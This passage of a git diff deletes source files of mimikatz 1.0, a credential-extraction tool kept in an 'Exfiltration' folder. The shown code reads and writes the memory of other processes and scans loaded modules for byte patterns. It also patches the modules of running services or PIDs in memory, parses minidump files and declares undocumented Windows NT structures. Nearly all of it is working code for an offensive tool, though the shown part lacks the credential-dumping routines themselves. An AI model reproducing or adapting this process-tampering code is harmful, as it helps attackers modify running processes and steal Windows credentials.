reussite = false; - DWORD OldProtect, OldProtect2; - - if(handleProcess == INVALID_HANDLE_VALUE) - { - if(VirtualProtect(adresseBase, longueur, PAGE_EXECUTE_READWRITE, &OldProtect) != 0) - { - reussite = (memcpy_s(adresseBase, longueur, adresseSource, longueur) == 0); - VirtualProtect(adresseBase, longueur, OldProtect, &OldProtect2); - } - } - else - { - if(VirtualProtectEx(handleProcess, adresseBase, longueur, PAGE_EXECUTE_READWRITE, &OldProtect) != 0) - { - SIZE_T dwBytesWrite = 0; - reussite = ((WriteProcessMemory(handleProcess, adresseBase, adresseSource, longueur, &dwBytesWrite) != 0) && (dwBytesWrite == longueur)); - VirtualProtectEx(handleProcess, adresseBase, longueur, OldProtect, &OldProtect2); - } - } - - return reussite; -} - - -bool mod_memory::searchMemory(const PBYTE adresseBase, const PBYTE adresseMaxMin, const PBYTE pattern, PBYTE * addressePattern, size_t longueur, bool enAvant, HANDLE handleProcess) -{ - BYTE * monTab = new BYTE[longueur]; - *addressePattern = adresseBase; - bool succesLecture = true; - bool succesPattern = false; - - while((!adresseMaxMin || (enAvant ? (*addressePattern + longueur) <= adresseMaxMin : (*addressePattern - longueur) >= adresseMaxMin)) && succesLecture && !succesPattern) - { - if(succesLecture = readMemory(*addressePattern, monTab, longueur, handleProcess)) - { - if(!(succesPattern = (memcmp(monTab, pattern, longueur) == 0))) - { - *addressePattern += (enAvant ? 1 : -1); - } - } - } - delete[] monTab; - - if(!succesPattern) - *addressePattern = NULL; - - return succesPattern; -} - -bool mod_memory::searchMemory(const PBYTE adresseBase, const long offsetMaxMin, const PBYTE pattern, long * offsetPattern, size_t longueur, bool enAvant, HANDLE handleProcess) -{ - PBYTE addressePattern = NULL; - bool resultat = mod_memory::searchMemory(adresseBase, (offsetMaxMin != 0 ? (adresseBase + offsetMaxMin) : NULL), pattern, &addressePattern, longueur, enAvant, handleProcess); - *offsetPattern = addressePattern - adresseBase; - return resultat; -} - -bool mod_memory::genericPatternSearch(PBYTE * thePtr, wchar_t * moduleName, BYTE pattern[], ULONG taillePattern, LONG offSetToPtr, char * startFunc, bool enAvant, bool noPtr) -{ - bool resultat = false; - if(thePtr && pattern && taillePattern) - { - if(HMODULE monModule = GetModuleHandle(moduleName)) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - PBYTE addrMonModule = reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - - if(PBYTE addrDebut = startFunc ? reinterpret_cast<PBYTE>(GetProcAddress(monModule, startFunc)) : addrMonModule) - { - if(resultat = mod_memory::searchMemory(addrDebut, enAvant ? (addrMonModule + mesInfos.SizeOfImage) : reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll), pattern, thePtr, taillePattern, enAvant)) - { - *thePtr += offSetToPtr; - if(!noPtr) - { -#ifdef _M_X64 - *thePtr += sizeof(long) + *reinterpret_cast<long *>(*thePtr); -#elif defined _M_IX86 - *thePtr = *reinterpret_cast<PBYTE *>(*thePtr); -#endif - } - } - else *thePtr = NULL; - } - } - } - } - return resultat; -} - -/*bool mod_memory::WhereIsMyFuckingRelativePattern(const PBYTE adresseBase, const PBYTE addrPattern, const PBYTE maskPattern, PBYTE *addressePattern, size_t longueurMask, const long offsetAddrInMask, const long offset) // et merde je la documente pas celle l ! -{ - PBYTE autreAddr = adresseBase; - PBYTE monMask = new BYTE[longueurMask]; - PBYTE monTab = new BYTE[longueurMask]; - - RtlCopyMemory(monMask, maskPattern, longueurMask); - bool succesLecture = false, succesPattern = false; - do - { - PBYTE funkyDiff = reinterpret_cast<PBYTE>(addrPattern - (autreAddr + offsetAddrInMask + 4)); - RtlCopyMemory(monMask+offsetAddrInMask, reinterpret_cast<PBYTE>(&funkyDiff), 4); - succesLecture = readMemory(autreAddr, monTab, longueurMask); - succesPattern = memcmp(monTab, monMask, longueurMask) == 0; - autreAddr+=offset; - } while(!succesPattern && succesLecture); - - delete[] monMask; - - if(succesPattern && succesLecture) - { - *addressePattern = autreAddr-offset; - return true; - } - else return false; -}*/ diff --git a/Exfiltration/mimikatz-1.0/modules/mod_memory.h b/Exfiltration/mimikatz-1.0/modules/mod_memory.h deleted file mode 100644 index 31eb27f..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_memory.h +++ /dev/null @@ -1,22 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <psapi.h> - -class mod_memory -{ -public: - static bool readMemory(const void * adresseBase, void * adresseDestination, size_t longueur = 1, HANDLE handleProcess = INVALID_HANDLE_VALUE); - static bool writeMemory(void * adresseBase, const void * adresseSource, size_t longueur = 1, HANDLE handleProcess = INVALID_HANDLE_VALUE); - - static bool searchMemory(const PBYTE adresseBase, const PBYTE adresseMaxMin, const PBYTE pattern, PBYTE * addressePattern, size_t longueur = 1, bool enAvant = true, HANDLE handleProcess = INVALID_HANDLE_VALUE); - static bool searchMemory(const PBYTE adresseBase, const long offsetMaxMin, const PBYTE pattern, long * offsetPattern, size_t longueur = 1, bool enAvant = true, HANDLE handleProcess = INVALID_HANDLE_VALUE); - - static bool genericPatternSearch(PBYTE * thePtr, wchar_t * moduleName, BYTE pattern[], ULONG taillePattern, LONG offSetToPtr, char * startFunc = NULL, bool enAvant = true, bool noPtr = false); - - /*static bool WhereIsMyFuckingRelativePattern(const PBYTE adresseBase, const PBYTE addrPattern, const PBYTE maskPattern, PBYTE *addressePattern, size_t longueurMask, const long offsetAddrInMask, const long offset = 1); // et merde je la documente pas celle l !*/ -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_minidump.cpp b/Exfiltration/mimikatz-1.0/modules/mod_minidump.cpp deleted file mode 100644 index 2825451..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_minidump.cpp +++ /dev/null @@ -1,163 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_minidump.h" - -mod_minidump::mod_minidump() : monFichier(NULL), monFileMapping(NULL), mesDonnees(NULL) -{ -} - -mod_minidump::~mod_minidump(void) -{ - if(mesDonnees) - UnmapViewOfFile(mesDonnees); - - if(monFileMapping) - CloseHandle(monFileMapping); - - if(monFichier) - CloseHandle(monFichier); -} - -LPVOID mod_minidump::RVAtoPTR(RVA monRVA) -{ - return reinterpret_cast<PBYTE>(mesDonnees) + monRVA; -} - -bool mod_minidump::open(wchar_t * filename) -{ - bool resultat = false; - - if(monFichier = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)) - if(monFileMapping = CreateFileMapping(monFichier, NULL, PAGE_READONLY, 0, 0, NULL)) - if(mesDonnees = MapViewOfFile(monFileMapping, FILE_MAP_READ, 0, 0, 0)) - resultat = (reinterpret_cast<PMINIDUMP_HEADER>(mesDonnees)->Signature == MINIDUMP_SIGNATURE) && (static_cast<WORD>(reinterpret_cast<PMINIDUMP_HEADER>(mesDonnees)->Version) == MINIDUMP_VERSION); - - return resultat; -} - -MINIDUMP_TYPE mod_minidump::getFlags() -{ - return static_cast<MINIDUMP_TYPE>(reinterpret_cast<PMINIDUMP_HEADER>(mesDonnees)->Flags); -} - -const wchar_t *FlagsString[] = { - L"MiniDumpNormal", - L"MiniDumpWithDataSegs", - L"MiniDumpWithFullMemory", - L"MiniDumpWithHandleData", - L"MiniDumpFilterMemory", - L"MiniDumpScanMemory", - L"MiniDumpWithUnloadedModules", - L"MiniDumpWithIndirectlyReferencedMemory", - L"MiniDumpFilterModulePaths", - L"MiniDumpWithProcessThreadData", - L"MiniDumpWithPrivateReadWriteMemory", - L"MiniDumpWithoutOptionalData", - L"MiniDumpWithFullMemoryInfo", - L"MiniDumpWithThreadInfo", - L"MiniDumpWithCodeSegs", - L"MiniDumpWithoutAuxiliaryState", - L"MiniDumpWithFullAuxiliaryState", - L"MiniDumpWithPrivateWriteCopyMemory", - L"MiniDumpIgnoreInaccessibleMemory", - L"MiniDumpWithTokenInformation" -}; - -bool mod_minidump::FlagsToStrings(vector<wstring> * monVecteur) -{ - return FlagsToStrings(getFlags(), monVecteur); -} - -bool mod_minidump::FlagsToStrings(MINIDUMP_TYPE Flags, vector<wstring> * monVecteur) -{ - bool resultat = false; - - if(!Flags) - { - monVecteur->push_back(FlagsString[0]); - resultat = true; - } - else if(Flags & MiniDumpValidTypeFlags) - { - DWORD shift, i; - for(shift = MiniDumpWithDataSegs, i = 1; shift <= MiniDumpWithTokenInformation; shift<<=1, i++) - { - if((Flags & shift) == shift) - monVecteur->push_back(FlagsString[i]); - } - resultat = true; - } - - return resultat; -} - -LPVOID mod_minidump::getStream(MINIDUMP_STREAM_TYPE type) -{ - PMINIDUMP_DIRECTORY mesRepertoires = reinterpret_cast<PMINIDUMP_DIRECTORY>(RVAtoPTR(reinterpret_cast<PMINIDUMP_HEADER>(mesDonnees)->StreamDirectoryRva)); - for(DWORD i = 0; i < reinterpret_cast<PMINIDUMP_HEADER>(mesDonnees)->NumberOfStreams; i++) - { - if(mesRepertoires[i].StreamType == type) - return RVAtoPTR(mesRepertoires[i].Location.Rva); - } - return NULL; -} - -PMINIDUMP_MODULE mod_minidump::getMinidumpModule(wstring & nomModule) -{ - if(PMINIDUMP_MODULE_LIST monObject = reinterpret_cast<PMINIDUMP_MODULE_LIST>(getStream(ModuleListStream))) - { - for(DWORD i = 0; i < monObject->NumberOfModules; i++) - { - PMINIDUMP_MODULE monModule = &monObject->Modules[i]; - PMINIDUMP_STRING monModuleString = reinterpret_cast<PMINIDUMP_STRING>(RVAtoPTR(monObject->Modules[i].ModuleNameRva)); - if(mod_text::wstr_ends_with(monModuleString->Buffer, monModuleString->Length / sizeof(wchar_t), nomModule.c_str(), nomModule.size())) - return monModule; - } - } - return NULL; -} - -bool mod_minidump::getStreamsVector(vector<PMINIDUMP_DIRECTORY> * monVecteur) -{ - PMINIDUMP_DIRECTORY mesRepertoires = reinterpret_cast<PMINIDUMP_DIRECTORY>(RVAtoPTR(reinterpret_cast<PMINIDUMP_HEADER>(mesDonnees)->StreamDirectoryRva)); - for(DWORD i = 0; i < reinterpret_cast<PMINIDUMP_HEADER>(mesDonnees)->NumberOfStreams; monVecteur->push_back(&mesRepertoires[i++])); - return true; -} - -const wchar_t *StreamTypeString[] = { - L"UnusedStream", - L"ReservedStream0", - L"ReservedStream1", - L"ThreadListStream", - L"ModuleListStream", - L"MemoryListStream", - L"ExceptionStream", - L"SystemInfoStream", - L"ThreadExListStream", - L"Memory64ListStream", - L"CommentStreamA", - L"CommentStreamW", - L"HandleDataStream", - L"FunctionTableStream", - L"UnloadedModuleListStream", - L"MiscInfoStream", - L"MemoryInfoListStream", - L"ThreadInfoListStream", - L"HandleOperationListStream", - L"TokenStream" -}; - -wstring mod_minidump::StreamTypeToString(MINIDUMP_STREAM_TYPE monType) -{ - if(monType <= TokenStream) - return StreamTypeString[monType]; - else - { - wostringstream monStream; - monStream << L"Inconnu (" << monType << L")"; - return monStream.str(); - } -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_minidump.h b/Exfiltration/mimikatz-1.0/modules/mod_minidump.h deleted file mode 100644 index 4247ab0..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_minidump.h +++ /dev/null @@ -1,33 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <dbghelp.h> -#include "mod_text.h" - -class mod_minidump -{ -private: - HANDLE monFichier, monFileMapping; - LPVOID mesDonnees; - -public: - mod_minidump(); - virtual ~mod_minidump(void); - - LPVOID RVAtoPTR(RVA monRVA); - bool open(wchar_t * filename); - LPVOID getStream(MINIDUMP_STREAM_TYPE type); - - PMINIDUMP_MODULE getMinidumpModule(wstring & nomModule); - bool getStreamsVector(vector<PMINIDUMP_DIRECTORY> * monVecteur); - MINIDUMP_TYPE getFlags(); - bool FlagsToStrings(vector<wstring> * monVecteur); - - - static wstring StreamTypeToString(MINIDUMP_STREAM_TYPE monType); - static bool FlagsToStrings(MINIDUMP_TYPE Flags, vector<wstring> * monVecteur); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_ntddk.h b/Exfiltration/mimikatz-1.0/modules/mod_ntddk.h deleted file mode 100644 index 7188f2d..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_ntddk.h +++ /dev/null @@ -1,322 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include <windows.h> -#include <ntsecapi.h> - -typedef LONG KPRIORITY; -typedef void** PPVOID; - -typedef enum _SYSTEM_INFORMATION_CLASS { - SystemBasicInformation, - SystemProcessorInformation, - SystemPerformanceInformation, - SystemTimeOfDayInformation, - SystemPathInformation, - SystemProcessInformation, - SystemCallCountInformation, - SystemDeviceInformation, - SystemProcessorPerformanceInformation, - SystemFlagsInformation, - SystemCallTimeInformation, - SystemModuleInformation, - SystemLocksInformation, - SystemStackTraceInformation, - SystemPagedPoolInformation, - SystemNonPagedPoolInformation, - SystemHandleInformation, - SystemObjectInformation, - SystemPageFileInformation, - SystemVdmInstemulInformation, - SystemVdmBopInformation, - SystemFileCacheInformation, - SystemPoolTagInformation, - SystemInterruptInformation, - SystemDpcBehaviorInformation, - SystemFullMemoryInformation, - SystemLoadGdiDriverInformation, - SystemUnloadGdiDriverInformation, - SystemTimeAdjustmentInformation, - SystemSummaryMemoryInformation, - SystemNextEventIdInformation, - SystemEventIdsInformation, - SystemCrashDumpInformation, - SystemExceptionInformation, - SystemCrashDumpStateInformation, - SystemKernelDebuggerInformation, - SystemContextSwitchInformation, - SystemRegistryQuotaInformation, - SystemExtendServiceTableInformation, - SystemPrioritySeperation, - SystemPlugPlayBusInformation, - SystemDockInformation, - KIWI_SystemPowerInformation, - SystemProcessorSpeedInformation, - SystemCurrentTimeZoneInformation, - SystemLookasideInformation, - KIWI_SystemMmSystemRangeStart = 50 -} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; - -typedef enum _OBJECT_INFORMATION_CLASS { - ObjectBasicInformation, - ObjectNameInformation, - ObjectTypeInformation, - ObjectAllInformation, - ObjectDataInformation -} OBJECT_INFORMATION_CLASS, *POBJECT_INFORMATION_CLASS; - - -typedef enum _PROCESSINFOCLASS { - ProcessBasicInformation, - ProcessQuotaLimits, - ProcessIoCounters, - ProcessVmCounters, - ProcessTimes, - ProcessBasePriority, - ProcessRaisePriority, - ProcessDebugPort, - ProcessExceptionPort, - ProcessAccessToken, - ProcessLdtInformation, - ProcessLdtSize, - ProcessDefaultHardErrorMode, - ProcessIoPortHandlers, // Note: this is kernel mode only - ProcessPooledUsageAndLimits, - ProcessWorkingSetWatch, - ProcessUserModeIOPL, - ProcessEnableAlignmentFaultFixup, - ProcessPriorityClass, - ProcessWx86Information, - ProcessHandleCount, - ProcessAffinityMask, - ProcessPriorityBoost, - ProcessDeviceMap, - ProcessSessionInformation, - ProcessForegroundInformation, - ProcessWow64Information, - ProcessImageFileName, - ProcessLUIDDeviceMapsEnabled, - ProcessBreakOnTermination, - ProcessDebugObjectHandle, - ProcessDebugFlags, - ProcessHandleTracing, - ProcessIoPriority, - ProcessExecuteFlags, - ProcessTlsInformation, - ProcessCookie, - ProcessImageInformation, - ProcessCycleTime, - ProcessPagePriority, - ProcessInstrumentationCallback, - ProcessThreadStackAllocation, - ProcessWorkingSetWatchEx, - ProcessImageFileNameWin32, - ProcessImageFileMapping, - ProcessAffinityUpdateMode, - ProcessMemoryAllocationMode, - ProcessGroupInformation, - ProcessTokenVirtualizationEnabled, - ProcessConsoleHostProcess, - ProcessWindowInformation, - MaxProcessInfoClass // MaxProcessInfoClass should always be the last enum -} PROCESSINFOCLASS; - -typedef enum _POOL_TYPE -{ - NonPagedPool, - PagedPool, - NonPagedPoolMustSucceed, - DontUseThisType, - NonPagedPoolCacheAligned, - PagedPoolCacheAligned, - NonPagedPoolCacheAlignedMustS -} POOL_TYPE, *PPOOL_TYPE; - -typedef struct _PROCESS_SESSION_INFORMATION { - ULONG SessionId; -} PROCESS_SESSION_INFORMATION, *PPROCESS_SESSION_INFORMATION; - -typedef struct _PROCESS_ACCESS_TOKEN { - HANDLE Token; - HANDLE Thread; -} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN; - -typedef struct _OBJECT_TYPE_INFORMATION -{ - UNICODE_STRING Name; - ULONG TotalNumberOfObjects; - ULONG TotalNumberOfHandles; - ULONG TotalPagedPoolUsage; - ULONG TotalNonPagedPoolUsage; - ULONG TotalNamePoolUsage; - ULONG TotalHandleTableUsage; - ULONG HighWaterNumberOfObjects; - ULONG HighWaterNumberOfHandles; - ULONG HighWaterPagedPoolUsage; - ULONG HighWaterNonPagedPoolUsage; - ULONG HighWaterNamePoolUsage; - ULONG HighWaterHandleTableUsage; - ULONG InvalidAttributes; - GENERIC_MAPPING GenericMapping; - ULONG ValidAccess; - BOOLEAN SecurityRequired; - BOOLEAN MaintainHandleCount; - USHORT MaintainTypeList; - POOL_TYPE PoolType; - ULONG PagedPoolUsage; - ULONG NonPagedPoolUsage; -} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; - -typedef struct _LDR_DATA_TABLE_ENTRY -{ - LIST_ENTRY InLoadOrderLinks; - LIST_ENTRY InMemoryOrderLinks; - LIST_ENTRY InInitializationOrderLinks; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STRING FullDllName; - UNICODE_STRING BaseDllName; - ULONG Flags; - WORD LoadCount; - WORD TlsIndex; - union - { - LIST_ENTRY HashLinks; - struct - { - PVOID SectionPointer; - ULONG CheckSum; - }; - }; - union - { - ULONG TimeDateStamp; - PVOID LoadedImports; - }; - DWORD EntryPointActivationContext; //_ACTIVATION_CONTEXT * EntryPointActivationContext; - PVOID PatchInformation; - LIST_ENTRY ForwarderLinks; - LIST_ENTRY ServiceTagLinks; - LIST_ENTRY StaticLinks; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - - -typedef struct _PEB_LDR_DATA { - ULONG Length; - BOOLEAN Initialized; - PVOID SsHandle; - LIST_ENTRY InLoadOrderModulevector; - LIST_ENTRY InMemoryOrderModulevector; - LIST_ENTRY InInitializationOrderModulevector; -} PEB_LDR_DATA, *PPEB_LDR_DATA; - - -typedef struct _PEB -{ - BOOLEAN InheritedAddressSpace; - BOOLEAN ReadImageFileExecOptions; - BOOLEAN BeingDebugged; - BOOLEAN Spare; - HANDLE Mutant; - PVOID ImageBaseAddress; - PPEB_LDR_DATA LoaderData; - PVOID ProcessParameters; //PRTL_USER_PROCESS_PARAMETERS ProcessParameters; - PVOID SubSystemData; - PVOID ProcessHeap; - PVOID FastPebLock; - PVOID FastPebLockRoutine; //PPEBLOCKROUTINE FastPebLockRoutine; - PVOID FastPebUnlockRoutine; //PPEBLOCKROUTINE FastPebUnlockRoutine; - ULONG EnvironmentUpdateCount; - PPVOID KernelCallbackTable; - PVOID EventLogSection; - PVOID EventLog; - DWORD Freevector; //PPEB_FREE_BLOCK Freevector; - ULONG TlsExpansionCounter; - PVOID TlsBitmap; - ULONG TlsBitmapBits[0x2]; - PVOID ReadOnlySharedMemoryBase; - PVOID ReadOnlySharedMemoryHeap; - PPVOID ReadOnlyStaticServerData; - PVOID AnsiCodePageData; - PVOID OemCodePageData; - PVOID UnicodeCaseTableData; - ULONG NumberOfProcessors; - ULONG NtGlobalFlag; - BYTE Spare2[0x4]; - LARGE_INTEGER CriticalSectionTimeout; - ULONG HeapSegmentReserve; - ULONG HeapSegmentCommit; - ULONG HeapDeCommitTotalFreeThreshold; - ULONG HeapDeCommitFreeBlockThreshold; - ULONG NumberOfHeaps; - ULONG MaximumNumberOfHeaps; - PPVOID *ProcessHeaps; - PVOID GdiSharedHandleTable; - PVOID ProcessStarterHelper; - PVOID GdiDCAttributevector; - PVOID LoaderLock; - ULONG OSMajorVersion; - ULONG OSMinorVersion; - ULONG OSBuildNumber; - ULONG OSPlatformId; - ULONG ImageSubSystem; - ULONG ImageSubSystemMajorVersion; - ULONG ImageSubSystemMinorVersion; - ULONG GdiHandleBuffer[0x22]; - ULONG PostProcessInitRoutine; - ULONG TlsExpansionBitmap; - BYTE TlsExpansionBitmapBits[0x80]; - ULONG SessionId; -} PEB, *PPEB; - -typedef struct _PROCESS_BASIC_INFORMATION { - NTSTATUS ExitStatus; - PPEB PebBaseAddress; - ULONG_PTR AffinityMask; - KPRIORITY BasePriority; - ULONG_PTR UniqueProcessId; - ULONG_PTR InheritedFromUniqueProcessId; -} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION; - -typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION { - SIZE_T Size; // Must be set to structure size on input - PROCESS_BASIC_INFORMATION BasicInfo; - union { - ULONG Flags; - struct { - ULONG IsProtectedProcess : 1; - ULONG IsWow64Process : 1; - ULONG IsProcessDeleting : 1; - ULONG IsCrossSessionCreate : 1; - ULONG SpareBits : 28; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION; - -typedef struct _SYSTEM_HANDLE -{ - DWORD ProcessId; - BYTE ObjectTypeNumber; - BYTE Flags; - USHORT Handle; - PVOID Object; - ACCESS_MASK GrantedAccess; -} SYSTEM_HANDLE, *PSYSTEM_HANDLE; - -typedef struct _SYSTEM_HANDLE_INFORMATION -{ - DWORD HandleCount; - SYSTEM_HANDLE Handles[1]; -} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; - -typedef NTSTATUS (WINAPI * PNT_QUERY_INFORMATION_PROCESS) (__in HANDLE ProcessHandle, __in PROCESSINFOCLASS ProcessInformationClass, __out PVOID ProcessInformation, __in ULONG ProcessInformationLength, __out_opt PULONG ReturnLength); -typedef NTSTATUS (WINAPI * PNT_SET_INFORMATION_PROCESS) (__in HANDLE ProcessHandle, __in PROCESSINFOCLASS ProcessInformationClass, __in PVOID ProcessInformation, __in ULONG ProcessInformationLength); -typedef NTSTATUS (WINAPI * PNT_SUSPEND_PROCESS) (__in HANDLE ProcessHandle); -typedef NTSTATUS (WINAPI * PNT_RESUME_PROCESS) (__in HANDLE ProcessHandle); -typedef NTSTATUS (WINAPI * PNT_QUERY_SYSTEM_INFORMATION) (__in SYSTEM_INFORMATION_CLASS SystemInformationClass, __inout PVOID SystemInformation, __in ULONG SystemInformationLength, __out_opt PULONG ReturnLength); -typedef NTSTATUS (WINAPI * PNT_QUERY_OBJECT) (__in_opt HANDLE Handle, __in OBJECT_INFORMATION_CLASS ObjectInformationClass, __out_opt PVOID ObjectInformation, __in ULONG ObjectInformationLength, __out_opt PULONG ReturnLength); -typedef NTSTATUS (WINAPI * PNT_FILTER_TOKEN) (__in HANDLE ExistingTokenHandle, __in ULONG Flags, __in PTOKEN_GROUPS SidsToDisable, __in PTOKEN_PRIVILEGES PrivilegeToDelete, __in PTOKEN_GROUPS SidsToRestricted, __out PHANDLE NewTokenHandle);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_parseur.cpp b/Exfiltration/mimikatz-1.0/modules/mod_parseur.cpp deleted file mode 100644 index 3388c3e..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_parseur.cpp +++ /dev/null @@ -1,38 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_parseur.h" - -vector<wstring> mod_parseur::parse(const wstring & line) -{ - vector<wstring> result; - - wstring item; - wstringstream ss(line); - - while(ss >> item) - { - if (item[0] == L'"') - { - if (item[item.length() - 1] == L'"') - { - result.push_back(item.substr(1, item.length() -2)); - } - else - { - wstring restOfItem; - getline(ss, restOfItem, L'"'); - result.push_back(item.substr(1) + restOfItem); - } - } - else - { - result.push_back(item); - } - } - - return result; -} - diff --git a/Exfiltration/mimikatz-1.0/modules/mod_parseur.h b/Exfiltration/mimikatz-1.0/modules/mod_parseur.h deleted file mode 100644 index e897aba..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_parseur.h +++ /dev/null @@ -1,15 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <sstream> - -class mod_parseur -{ -public: - static vector<wstring> parse(const wstring & line); -}; - diff --git a/Exfiltration/mimikatz-1.0/modules/mod_patch.cpp b/Exfiltration/mimikatz-1.0/modules/mod_patch.cpp deleted file mode 100644 index 95b46c6..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_patch.cpp +++ /dev/null @@ -1,146 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_patch.h" -#include "..\mimikatz\global.h" - -bool mod_patch::patchModuleOfService(wstring serviceName, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace) -{ - bool reussite = false; - - mod_service::KIWI_SERVICE_STATUS_PROCESS monService; - if(mod_service::getUniqueForName(&monService, &serviceName)) - { - if(monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOPPED && monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOP_PENDING) - { - (*outputStream) << L"Service : " << monService.serviceDisplayName << endl; - reussite = patchModuleOfPID(monService.ServiceStatusProcess.dwProcessId, moduleName, patternToSearch, szPatternToSearch, patternToPlace, szPatternToPlace, offsetForPlace); - } - else (*outputStream) << L"Le service : " << serviceName << L" (" << monService.serviceDisplayName << L") ; n\'a pas l\'air trs actif" << endl; - } - else (*outputStream) << L"Impossible de trouver le service : " << serviceName << L" ; " << mod_system::getWinError() << endl; - - return reussite; -} - -bool mod_patch::patchModuleOfPID(DWORD pid, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace) -{ - bool reussite = false; - - mod_process::KIWI_MODULEENTRY32 monModule; - if(mod_process::getUniqueModuleForName(&monModule, (moduleName.empty() ? NULL : &moduleName), &pid)) - { - BYTE * baseAddr = monModule.modBaseAddr; - DWORD taille = monModule.modBaseSize; - - if(HANDLE processHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid)) - { - (*outputStream) << L"Recherche des patterns dans : " << moduleName << L"@pid(" << pid << L")" << endl; - - BYTE * addrPattern = NULL; - if(mod_memory::searchMemory(baseAddr, baseAddr + taille, patternToSearch, &addrPattern, szPatternToSearch, true, processHandle)) - { - reussite = mod_memory::writeMemory(addrPattern + offsetForPlace, patternToPlace, szPatternToPlace, processHandle); - (*outputStream) << L"Patch " << moduleName << L"@pid(" << pid << L") : " << (reussite ? L"OK" : L"KO") << endl; - } - else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; - - CloseHandle(processHandle); - } - else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl; - return reussite; -} - -bool mod_patch::getFullVersion(DWORD * majorVersion, DWORD * minorVersion, DWORD * build, bool * isServer, bool * is64) -{ - bool reussite = false; - - OSVERSIONINFOEX maVersion; - if(reussite = mod_system::getVersion(&maVersion)) - { - if(majorVersion) *majorVersion = maVersion.dwMajorVersion; - if(majorVersion) *minorVersion = maVersion.dwMinorVersion; - if(build) *build = maVersion.dwBuildNumber; - if(isServer) *isServer = maVersion.wProductType != VER_NT_WORKSTATION; - - if(is64) - { - SYSTEM_INFO mesInfos; - GetNativeSystemInfo(&mesInfos); - - *is64 = (mesInfos.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64); - } - } - - return reussite; -} - -bool mod_patch::checkVersion(KIWI_OS_CHECK * monOsValide) -{ - bool reussite = false; - - DWORD majorVersion, minorVersion, build; - bool isServer, is64; - - if(getFullVersion(&majorVersion, &minorVersion, &build, &isServer, &is64)) - { - reussite = - (monOsValide->majorVersion == majorVersion) && - (monOsValide->minorVersion == minorVersion) && - ((monOsValide->build == build) || (monOsValide->build == 0)) && - (monOsValide->isServer == isServer) && - (monOsValide->is64 == is64) - ; - } - else (*outputStream) << L"mod_patch::getFullVersion : " << mod_system::getWinError() << endl; - return reussite; -} - -bool mod_patch::checkVersion(OS monOsValide) -{ - KIWI_OS_CHECK kOs; - switch(monOsValide) - { - case WINDOWS_2000_PRO_x86: kOs.majorVersion = 5; kOs.minorVersion = 0; kOs.build = 0; kOs.isServer = false; kOs.is64 = false; break; - case WINDOWS_2000_SRV_x86: kOs.majorVersion = 5; kOs.minorVersion = 0; kOs.build = 0; kOs.isServer = true; kOs.is64 = false; break; - - case WINDOWS_XP_PRO___x86: kOs.majorVersion = 5; kOs.minorVersion = 1; kOs.build = 0; kOs.isServer = false; kOs.is64 = false; break; - case WINDOWS_XP_PRO___x64: kOs.majorVersion = 5; kOs.minorVersion 